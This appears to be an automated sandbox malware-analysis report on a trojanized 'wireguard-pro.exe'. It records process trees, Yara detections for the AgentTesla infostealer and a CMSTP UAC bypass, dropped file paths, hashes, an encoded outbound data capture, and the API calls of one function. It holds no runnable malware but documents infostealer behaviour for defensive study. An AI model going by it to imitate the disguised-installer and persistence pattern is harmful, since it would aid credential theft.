2023-10-03 20:36:16 UTC	2881	OUT	Data Raw: 4d 45 7a 39 50 31 5a 31 36 37 35 63 4c 45 50 42 33 53 49 66 35 75 47 79 6e 4a 36 5a 37 4c 44 6d 54 58 47 6d 63 46 42 53 4e 52 46 74 4b 7a 52 49 58 31 66 4c 38 31 61 75 43 52 34 58 47 50 4b 41 5a 43 57 6f 4f 75 4c 5a 6d 59 6f 47 45 78 6d 69 76 4d 6d 25 32 42 69 68 65 65 43 30 41 52 50 45 44 46 4b 33 6f 67 58 6f 64 47 49 73 57 45 4d 6d 79 35 74 44 44 2f 79 46 44 44 41 74 49 7a 62 6a 74 69 58 61 4d 6b 56 54 43 69 68 6a 39 59 75 36 30 43 67 46 39 36 6d 4e 37 77 53 4b 46 50 63 6a 52 45 48 75 4d 7a 6c 51 4f 4c 73 59 34 33 75 4f 4f 47 66 72 63 54 61 69 65 32 37 4b 77 6c 6f 46 5a 7a 7a 77 6f 73 44 48 34 35 42 78 30 62 35 79 52 4f 69 78 41 44 61 77 47 59 67 49 46 55 44 48 35 64 6e 4f 54 4d 70 74 74 4c 69 33 51 69 71 78 38 5a 55 32 4e 6d 4f 59 67 2f 49 38 41 38 76 Data Ascii: MEz9P1Z1675cLEPB3SIf5uGynJ6Z7LDmTXGmcFBSNRFtKzRIX1fL81auCR4XGPKAZCWoOuLZmYoGExmivMm%2BiheeC0ARPEDFK3ogXodGIsWEMmy5tDD/yFDDAtIzbjtiXaMkVTCihj9Yu60CgF96mN7wSKFPcjREHuMzlQOLsY43uOOGfrcTaie27KwloFZzzwosDH45Bx0b5yROixADawGYgIFUDH5dnOTMpttLi3Qiqx8ZU2NmOYg/I8A8v

Target ID:	0
Start time:	22:34:51
Start date:	03/10/2023
Path:	C:\Users\user\Desktop\wireguard-pro.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\wireguard-pro.exe
Imagebase:	0x770000
File size:	739'328 bytes
MD5 hash:	C3FDABFA7E016AA9B2CACBB5FC9860A8
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.619000321.0000000012C8A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	22:34:51
Start date:	03/10/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff75c8e0000
File size:	625'664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	22:34:56
Start date:	03/10/2023
Path:	C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\Low\7ABGVF6Q.exe"
Imagebase:	0x300000
File size:	87'360 bytes
MD5 hash:	1CF9257C07936D7FBF508DC113E9B6D5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	22:34:56
Start date:	03/10/2023
Path:	C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe"
Imagebase:	0xb20000
File size:	187'392 bytes
MD5 hash:	64A509A5D856C0E1BC482E64E5EA8556
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.1130370284.0000000002FE7000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000003.00000000.614084883.0000000000B22000.00000002.00000001.01000000.00000008.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: Joe Security Rule: AgentTesla_1, Description: AgentTesla Payload, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: kevoreilly Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Roaming\Adobe\HQL82NEF.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	4
Start time:	22:34:59
Start date:	03/10/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\msiexec.exe /V
Imagebase:	0x7ff6a3270000
File size:	66'048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	22:35:00
Start date:	03/10/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\MsiExec.exe -Embedding 5AD05C264D17A520CC3AF28B9CDE51EF
Imagebase:	0x7ff6a3270000
File size:	66'048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	6
Start time:	22:35:00
Start date:	03/10/2023
Path:	C:\Windows\System32\msiexec.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\MsiExec.exe -Embedding CC7CB015DD9FB5BB407A6980FAC33728 E Global\MSI0000
Imagebase:	0x7ff6a3270000
File size:	66'048 bytes
MD5 hash:	4767B71A318E201188A0D0A420C8B608
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	22:35:06
Start date:	03/10/2023
Path:	C:\Program Files\WireGuard\wireguard.exe
Wow64 process (32bit):	false
Commandline:	C:\Program Files\WireGuard\wireguard.exe
Imagebase:	0x850000
File size:	8'185'648 bytes
MD5 hash:	18D5B6964A434AF936E1DB19D969DBBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000002.637369671.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000007.00000000.635889564.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: C:\Program Files\WireGuard\wireguard.exe, Author: Joe Security Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: C:\Program Files\WireGuard\wireguard.exe, Author: ditekSHen
Antivirus matches:	Detection: 0%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	22:35:07
Start date:	03/10/2023
Path:	C:\Program Files\WireGuard\wireguard.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\WireGuard\wireguard.exe" /installmanagerservice
Imagebase:	0x850000
File size:	8'185'648 bytes
MD5 hash:	18D5B6964A434AF936E1DB19D969DBBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000000.636854021.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.639295558.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	9
Start time:	22:35:07
Start date:	03/10/2023
Path:	C:\Program Files\WireGuard\wireguard.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\WireGuard\wireguard.exe" /managerservice
Imagebase:	0x850000
File size:	8'185'648 bytes
MD5 hash:	18D5B6964A434AF936E1DB19D969DBBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000000.637554175.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000009.00000002.1129430829.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	10
Start time:	22:35:07
Start date:	03/10/2023
Path:	C:\Program Files\WireGuard\wireguard.exe
Wow64 process (32bit):	false
Commandline:	"C:\Program Files\WireGuard\wireguard.exe" /ui 888 884 896 904
Imagebase:	0x850000
File size:	8'185'648 bytes
MD5 hash:	18D5B6964A434AF936E1DB19D969DBBB
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	Go lang
Yara matches:	Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000000.638265825.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1129407709.0000000000AD0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false

Show Windows behavior

Target ID:	17
Start time:	22:35:25
Start date:	03/10/2023
Path:	C:\Users\user\AppData\Roaming\audddd\audddd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\audddd\audddd.exe"
Imagebase:	0xaf0000
File size:	187'392 bytes
MD5 hash:	64A509A5D856C0E1BC482E64E5EA8556
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: Joe Security Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: Joe Security Rule: AgentTesla_1, Description: AgentTesla Payload, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: kevoreilly Rule: INDICATOR_SUSPICIOUS_GENInfoStealer, Description: Detects executables containing common artifcats observed in infostealers, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV2, Description: AgenetTesla Type 2 Keylogger payload, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: ditekSHen Rule: MALWARE_Win_AgentTeslaV3, Description: AgentTeslaV3 infostealer payload, Source: C:\Users\user\AppData\Roaming\audddd\audddd.exe, Author: ditekSHen
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 68%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	22:35:33
Start date:	03/10/2023
Path:	C:\Users\user\AppData\Roaming\audddd\audddd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\audddd\audddd.exe"
Imagebase:	0xd10000
File size:	187'392 bytes
MD5 hash:	64A509A5D856C0E1BC482E64E5EA8556
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000012.00000002.1130043330.00000000030AA000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	21
Start time:	22:35:41
Start date:	03/10/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff79a050000
File size:	51'288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	22:35:47
Start date:	03/10/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff79a050000
File size:	51'288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	22:36:16
Start date:	03/10/2023
Path:	C:\Windows\System32\svchost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\svchost.exe -k netsvcs -p
Imagebase:	0x7ff79a050000
File size:	51'288 bytes
MD5 hash:	32569E403279B3FD2EDB7EBD036273FA
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Function 00007FF7AE7204C8 Relevance: 2.0, Strings: 1, Instructions: 795COMMON

Download Yara Rule

Strings

@S_I, xrefs: 00007FF7AE720744

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID: @S_I
API String ID: 0-3867783015
Opcode ID: 0413dec9a2ff78cc851661894c1e7ef81023152f03d12d0c7786546ca8000634
Instruction ID: 8e9f659f79c18c9f3564dd6eda15ef722af9d92fe3213982ab31f171a106f5fa
Opcode Fuzzy Hash: 0413dec9a2ff78cc851661894c1e7ef81023152f03d12d0c7786546ca8000634
Instruction Fuzzy Hash: F8322432A1D5595FE708BF2CE8552F9B7E1FF85310F4041BAD04EC729BEE24A8868791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7AE7205B8 Relevance: 2.0, Strings: 1, Instructions: 721COMMON

Download Yara Rule

Strings

@S_I, xrefs: 00007FF7AE720744

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID: @S_I
API String ID: 0-3867783015
Opcode ID: 6684e7903a32912547636e0d98556c83a4faaa0350dac5c9613ba8ac4133c4ee
Instruction ID: 16433ad3a4953c8026e36e277fe6fef02b325b470e0aad83242de9668c49c874
Opcode Fuzzy Hash: 6684e7903a32912547636e0d98556c83a4faaa0350dac5c9613ba8ac4133c4ee
Instruction Fuzzy Hash: 89220131A1D5595FE708EF2CE8552F9B7E1FF89310F4041BAD04EC329BEE24A8868791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7AE7205A0 Relevance: 1.6, Strings: 1, Instructions: 361COMMON

Download Yara Rule

Strings

d, xrefs: 00007FF7AE72110E

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 7aee0a650ab86d8b79987e0f2556766749f1417b3508dd6a179bea9de5f45682
Instruction ID: 719ba6ba636a0021b1361ee204867af9d271fd4f062b4304ff35c0848f76f904
Opcode Fuzzy Hash: 7aee0a650ab86d8b79987e0f2556766749f1417b3508dd6a179bea9de5f45682
Instruction Fuzzy Hash: 8CB1DC30618B498FD768EB19D481536B3E1FF98300BA44A7DD09B836A6DA35F8438B91

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7AE720DD5 Relevance: 1.6, Strings: 1, Instructions: 360COMMON

Download Yara Rule

Strings

d, xrefs: 00007FF7AE72110E

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: 5e564540c80f042c11e465fc370c905c32fc84b20ec8adf19497e44b315e2693
Instruction ID: 0f822096a7b13a542d82c3b305cf5efbdf59088d0d06bf383049dc86b81e9b37
Opcode Fuzzy Hash: 5e564540c80f042c11e465fc370c905c32fc84b20ec8adf19497e44b315e2693
Instruction Fuzzy Hash: 90B11230A18B4A8FD769FB19C481676B3E1FF98300F95467DD08AC36A2DE35F8428791

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7AE7215C8 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

1S_I, xrefs: 00007FF7AE721644

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID: 1S_I
API String ID: 0-889874590
Opcode ID: da3b64e85a1ff58cb79c81611e9c0136dc879ad727780e60f9de9473a636a4cd
Instruction ID: 66727a88686c4a75db45806f2784dfe936f60be0d1493e627ff0a92ed68689d1
Opcode Fuzzy Hash: da3b64e85a1ff58cb79c81611e9c0136dc879ad727780e60f9de9473a636a4cd
Instruction Fuzzy Hash: B931AFB020E9C5EFC30A4F3DA85429DFFA1FF5921571082EBD05D8715BCA30AA2687D5

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7AE720808 Relevance: .5, Instructions: 527COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 078b7a7b77cfe03a9f9df2a28d4df9c20e9eb54356422358a6b2832ca9a5ca1b
Instruction ID: 224d2ff73b3c3c5063a6ae0fc309a9b3a0cd633b2d938d37c3b064598d0d608f
Opcode Fuzzy Hash: 078b7a7b77cfe03a9f9df2a28d4df9c20e9eb54356422358a6b2832ca9a5ca1b
Instruction Fuzzy Hash: 4BF1B131A199194FEB58FF2CD8A57BAB7E1FF59340F800179D04EC3297EE24A8468750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7AE722225 Relevance: .4, Instructions: 449COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f2d8ef41bf878d6a86a76ee56ab9777e67ea06cb01ad34770a7a4bf3083331d8
Instruction ID: ae15f9cb3713ef57ae7c5f6181eaa9a53c9ea68fffeb5f2fc662ede119c96372
Opcode Fuzzy Hash: f2d8ef41bf878d6a86a76ee56ab9777e67ea06cb01ad34770a7a4bf3083331d8
Instruction Fuzzy Hash: 89F0A42150E7CA1FE723B37D98741A5BFA0EF1A210F5A15EBC484CB1A7DA18AC458361

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7AE7207F8 Relevance: .1, Instructions: 140COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a333a005dcce5261c1bb09f1bf540c71e7fe2ba2b5bdd2cb390660a4bdf635a5
Instruction ID: eaff77584e401464ffffb1af749ea571ab18f6a81c1041a8dff1864cb7f4c925
Opcode Fuzzy Hash: a333a005dcce5261c1bb09f1bf540c71e7fe2ba2b5bdd2cb390660a4bdf635a5
Instruction Fuzzy Hash: 4341063290E6195FE718FF2DD8592B677E2EF55310F450076D04EC72A3EE74A84687A0

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7AE7216E8 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5a1f03a55c1ce90bd958ec37d02298c638d7c2b050a4d992b19094133933eda1
Instruction ID: 133bedd4b4ac14eb2fea22a682e6bd53c33d91c4b5d00ca88c0c734e4799457b
Opcode Fuzzy Hash: 5a1f03a55c1ce90bd958ec37d02298c638d7c2b050a4d992b19094133933eda1
Instruction Fuzzy Hash: 3021383060A94A5FD755E72D98586A9B7F1FFA924079442BBE04AC3256DF30BC038391

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7AE720D7E Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 042169d239e220229e628a31aa75c379efa8a7d9027e148921aecb82d586eb5f
Instruction ID: d793549997eb5a218abf5a53b2bf8926a9797301624580c6a836b71796929f13
Opcode Fuzzy Hash: 042169d239e220229e628a31aa75c379efa8a7d9027e148921aecb82d586eb5f
Instruction Fuzzy Hash: 82F0E251E0E9924FD795BB3C94652B8FBE0EF4A240B4980F6C448C75D7EA189C0AC3A1

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF7AE721798 Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.619299139.00007FF7AE720000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF7AE720000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff7ae720000_wireguard-pro.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bc2035770f18d1cdb1442b117a9a7deb14a85c1d06739539b27e94924001c0e7
Instruction ID: 2b159aff668f37402ecd48e4ddf831b6a8b43f10bfa74441705038727f642e85
Opcode Fuzzy Hash: bc2035770f18d1cdb1442b117a9a7deb14a85c1d06739539b27e94924001c0e7
Instruction Fuzzy Hash: 4BC09B02F4590A06DA8CF27D74521FD91C2DB89150FC25875E40DC2187ED6DACC70250

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 7ABGVF6Q.exePID: 5164, Parent PID: 7080COMMON

Execution Graph

Execution Coverage:	41.3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	5.6%
Total number of Nodes:	288
Total number of Limit Nodes:	7

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00308A03 Relevance: 65.3, APIs: 16, Strings: 21, Instructions: 519
filewindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 003091F7: GetWindowLongA.USER32(?,000000F0), ref: 0030920C
Part of subcall function 003091F7: _snprintf_s.MSVCRT ref: 0030922E
Part of subcall function 003091F7: SetWindowTextA.USER32 ref: 00309239
Part of subcall function 003091F7: SendMessageA.USER32(?,00000406,00000000,00000064), ref: 00309255
Part of subcall function 003091F7: SendMessageA.USER32(?,00000402,00000000,00000000), ref: 0030925F
Part of subcall function 003091F7: SetWindowLongA.USER32(?,000000F0,00000000), ref: 00309268
Part of subcall function 003091F7: SendMessageA.USER32(?,0000040A,00000001,00000000), ref: 00309277

ConvertStringSecurityDescriptorToSecurityDescriptorA.ADVAPI32(O:BAD:PAI(A;;FA;;;BA),00000001,?,00000000), ref: 00308A85
GetWindowsDirectoryA.KERNEL32(C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4,00000104), ref: 00308A9D
PathAppendA.KERNELBASE(C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4,Temp), ref: 00308AB5
PathAppendA.SHLWAPI(C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4,?), ref: 00308B35

Part of subcall function 00309B3C: RtlGetNtVersionNumbers.NTDLL(?,?), ref: 00309B58
Part of subcall function 00309B3C: _snprintf_s.MSVCRT ref: 00309B7F

Part of subcall function 00309284: MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4,00004000,00308DF7), ref: 00309298

Part of subcall function 00309B8F: RtlGetNtVersionNumbers.NTDLL(?,?), ref: 00309BA1

Part of subcall function 00309BBC: RtlGetNtVersionNumbers.NTDLL(?,?), ref: 00309BCE

LocalFree.KERNEL32(?,?,?,?,00000001), ref: 00308CDB
ShowWindow.USER32(0000000A), ref: 00308CED
exit.MSVCRT ref: 00308D29
CreateFileA.KERNELBASE(C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4,40010000,00000000,?,00000001,00000100,00000000), ref: 00308DBC
wcstoul.MSVCRT ref: 00308E96
memset.MSVCRT ref: 00308EC3
PostMessageA.USER32(00020432,00008000,00000000,00000000), ref: 00308F3B
memcpy.MSVCRT ref: 00308FB9
memcpy.MSVCRT ref: 003090A1
WriteFile.KERNELBASE(?,?,?,00000000), ref: 003090D2
CloseHandle.KERNEL32(?,?,00002000,?), ref: 00309151
ShowWindow.USER32(00000000,-00000001,?,?,-00000001,?,?), ref: 003091D0

Strings

,, xrefs: 00308E69
gj, xrefs: 00308EF9
verifying installer, xrefs: 003090F9
Download Error, xrefs: 00308CF5
/windows-client/latest.sig, xrefs: 00308C22
connecting to server, xrefs: 00308B71
Temp, xrefs: 00308AAB
verifying installer list, xrefs: 00308D50
determining paths, xrefs: 00308A72
download.wireguard.com, xrefs: 00308BE8
creating temporary file, xrefs: 00308D98
downloading installer, xrefs: 00308DE1
https://download.wireguard.com/windows-client/, xrefs: 00308D16
determining architecture, xrefs: 00308B4D
launching installer, xrefs: 003091BD
Something went wrong when downloading the WireGuard installer. Would you like to open your web browser to the MSI download page?, xrefs: 00308CFA
WireGuard-Fetcher/1.0 (Windows 10.0.17134; amd64), xrefs: 00308B80
O:BAD:PAI(A;;FA;;;BA), xrefs: 00308A80
downloading installer list, xrefs: 00308C18
C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4, xrefs: 00308A98, 00308AB0, 00308B30, 00308DB7, 00309160, 003091D7
C:\Windows\Temp\4eaca70120bbdfc28af7643294bbbe9517fd84226e93a75b3d64e64e377b4cb4, xrefs: 00308B9D, 00308BF9, 00308C44, 00308E0F, 0030916A

Memory Dump Source

Source File: 00000002.00000002.636618839.0000000000301000.00000020.00000001.01000000.00000007.sdmp, Offset: 00300000, based on PE: true

Associated: 00000002.00000002.636613469.0000000000300000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636625601.000000000030B000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.636630549.000000000030D000.00000004.00000001.01000000.00000007.sdmpDownload File
